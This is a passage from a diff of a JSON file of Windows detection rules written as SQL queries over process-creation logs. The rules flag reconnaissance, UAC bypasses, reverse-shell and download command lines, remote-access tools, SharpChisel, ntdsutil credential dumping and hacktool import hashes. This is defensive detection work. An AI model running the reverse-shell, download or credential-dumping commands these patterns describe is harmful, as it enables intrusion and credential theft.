Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "status": "experimental", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1057" + "attack.t1087.001" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Administrative activity" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR OriginalFileName = 'tasklist.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tasklist_basic_execution.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "title": "File Download Via Curl.EXE", + "id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "description": "Detects file download using curl.exe", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Remote Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", - "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "status": "experimental", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.003" ], "falsepositives": [ - "NTDS maintenance" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + ], + "filename": "proc_creation_win_hktl_sharp_chisel.yml" + }, + { + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Proxy Execution Via Explorer.exe", - "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "status": "test", - "description": "Attackers can use explorer.exe for evading defense mechanisms", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Legitimate explorer.exe run from cmd.exe" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_lolbin_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", - "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Node Process Executions", + "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "status": "experimental", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 